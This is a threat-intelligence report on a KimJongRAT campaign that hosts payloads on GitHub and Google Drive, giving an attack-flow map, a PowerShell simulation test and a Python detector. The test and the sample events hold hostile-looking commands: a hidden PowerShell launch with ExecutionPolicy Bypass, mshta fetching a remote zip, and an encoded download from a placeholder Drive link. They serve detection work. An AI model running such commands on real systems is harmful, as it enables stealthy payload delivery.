SOC Prime Bias: Critical

30 Jun 2026 06:48 UTC

KimJongRAT Continues to Evolve Through Living Off Trusted Sites

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A recent KimJongRAT campaign has been observed using GitHub Releases and Google Drive as trusted platforms to host and deliver malware. This updated variant blends InfoStealer and RAT functionality while relying on Living Off Trusted Sites (LOTS) techniques to lower the chance of detection. It has also evolved to retrieve command-and-control addresses dynamically from Google Drive, reducing the need for repeated recompilation.

Investigation

The investigation reviewed a May 2026 campaign in which victims were redirected through shortened links to GitHub-hosted ZIP archives containing malicious LNK files. Researchers mapped the execution chain, including abuse of mshta.exe, VBScript, and PowerShell to launch multi-stage payloads. The analysis also uncovered a new capability involving deployment of MeshAgent for long-term remote access.

Mitigation

Organizations should enforce strict controls over execution of LNK files and mshta.exe when sourced from untrusted locations. Monitoring for suspicious PowerShell behavior, including Base64-encoded commands and downloads from cloud services such as Google Drive and GitHub, is essential. Restricting unauthorized remote management tools such as MeshAgent can further limit the impact of compromise.

Response

If this activity is detected, isolate affected hosts immediately to prevent lateral movement and data exfiltration. Conduct memory forensics to identify any active malicious DLLs or PowerShell components. Review Google Drive and GitHub access logs for unusual activity tied to the identified infrastructure, and update endpoint detections with the extracted indicators of compromise.

Attack Flow

    flowchart TD
        step_initial_access["T1566.001 & T1566.002 – Phishing: Spearphishing Attachment/Link: Lured via shortened URLs to download tax_edoc.zip from GitHub"]
        step_user_execution["T1204.002 – User Execution: Malicious File: Victim opens a malicious LNK file from the extracted ZIP"]
        rules_for_user_execution("<b>Rule Name</b>: Execution from ZIP Archive [7zip] (via process_creation)<br/><b>Rule ID</b>: 43917da8-4e9a-4cd2-b3f9-dc60e2326534")
        step_proxy_execution["T1218.005 – System Binary Proxy Execution: Mshta: Uses Mshta to download and execute pdfko.zip from GitHub"]
        step_script_execution["T1218.001 & T1216.002 – System Binary/Script Proxy Execution: Obfuscated VBScript in HTA uses Compiled HTML File and SyncAppvPublishingServer"]
        step_decoy_steganography["T1027.003 – Obfuscated Files or Information: Steganography: Downloads a decoy document to distract the user"]
        step_branching{"Environment Check: Determines if Windows Defender is active"}
        step_defender_inactive["T1027 & T1218.011 – Obfuscated Files & Rundll32: Downloads encrypted user.txt/sys.log via AES/RC4 and executes sys.dll"]
        step_defender_active["T1027.006 – Obfuscated Files or Information: HTML Smuggling: Executes PowerShell 1.ps1 to decode KimJongRAT"]
        step_persistence_c2["T1219 & T1568 & T1578 – Persistence & C2: Installs MeshAgent and uses Dynamic Resolution via Google Drive to update C2 addresses"]
        step_initial_access -->|leads_to| step_user_execution
        step_user_execution -->|leads_to| step_proxy_execution
        step_user_execution -.->|detected_by| rules_for_user_execution
        step_proxy_execution -->|leads_to| step_script_execution
        step_script_execution -->|leads_to| step_decoy_steganography
        step_decoy_steganography -->|leads_to| step_branching
        step_branching -->|if_inactive| step_defender_inactive
        step_branching -->|if_active| step_defender_active
        step_defender_inactive -->|leads_to| step_persistence_c2
        step_defender_active -->|leads_to| step_persistence_c2

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has successfully gained a foothold and is attempting to execute the KimJongRAT payload. To evade simple signature-based detection, the malware is designed to run a PowerShell script in a hidden window, bypassing the execution policy, and passing a specific log filename as a parameter to handle its encrypted configuration. The goal is to establish a persistent, stealthy remote access trojan (RAT) on the victim machine. We will execute the exact command pattern identified in the detection rule to validate the “selection_execute” logic.

  • Regression Test Script:

    # Simulation of KimJongRAT execution pattern
    # This creates a dummy script to satisfy the '-File' requirement
    "Write-Output 'Simulating KimJongRAT Payload'" | Out-File -FilePath "1.ps1" -Encoding ascii
    
    # Executing the command that triggers the detection rule
    # Note: This is run in a way that mimics the command line arguments exactly.
    Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log" -WindowStyle Hidden

  • Cleanup Commands:

    # Remove the dummy files created during simulation
    Remove-Item -Path "1.ps1" -ErrorAction SilentlyContinue
    Remove-Item -Path "1.log" -ErrorAction SilentlyContinue
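As an added defender-side example (not code from SOC Prime or the report), the Python below applies the checks from the Mitigation section and the command pattern exercised by the regression test above to constructed process_creation events: it decodes -EncodedCommand payloads (PowerShell expects UTF-16LE base64), and flags mshta.exe fetching remote content, the hidden-window/ExecutionPolicy Bypass/-File/-FileName pattern, and references to the GitHub and Google Drive hosts named in the report. The host list, the sample command lines, the example-org GitHub path and PLACEHOLDER_ID are constructed assumptions, not indicators from the report.

```python
import base64
import re

# Hosts the report names as abused "trusted sites" for payload hosting and C2 resolution (assumed list).
CLOUD_HOSTS = ("github.com", "githubusercontent.com", "drive.google.com")

# Constructed sample process_creation events (image, command line); not telemetry from the report.
_ENC = base64.b64encode("iwr https://drive.google.com/uc?id=PLACEHOLDER_ID -OutFile user.txt".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\mshta.exe", "mshta.exe https://github.com/example-org/example/releases/download/v1/pdfko.zip"),
    (PS, "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log"),
    (PS, "powershell.exe -nop -w hidden -enc " + _ENC),
    (PS, r"powershell.exe -File C:\Scripts\nightly-backup.ps1"),  # benign admin task, should not fire
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (any of its short aliases), or None if absent/invalid."""
    m = re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(image, cmdline):
    """Return the list of pattern names the event matches; an empty list means no hit."""
    reasons = []
    image, low = image.lower(), cmdline.lower()
    if image.endswith("mshta.exe") and re.search(r"https?://", low):
        reasons.append("mshta_remote_url")  # T1218.005 stage of the chain
    if image.endswith("powershell.exe"):
        # The exact pattern exercised by the regression test above (selection_execute logic).
        if ("bypass" in low and re.search(r"-w(?:indowstyle)?\s+hidden", low)
                and re.search(r"-file\s+\S+\.ps1", low) and re.search(r"-filename\s+\S+\.log", low)):
            reasons.append("ps_hidden_bypass_file_log")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            reasons.append("ps_encoded_command")
            if any(h in decoded.lower() for h in CLOUD_HOSTS):
                reasons.append("cloud_download_in_encoded_command")
    if any(h in low for h in CLOUD_HOSTS):  # plaintext reference to an abused cloud host
        reasons.append("cloud_host_in_cmdline")
    return reasons

def scan(events):
    """Run the checks over a batch of (image, cmdline) events and return only the flagged ones."""
    return [(cmdline, r) for image, cmdline in events if (r := classify(image, cmdline))]
```

Decoding the encoded command before matching is what catches the Google Drive download in the third event, which a plaintext host match on the command line alone would miss.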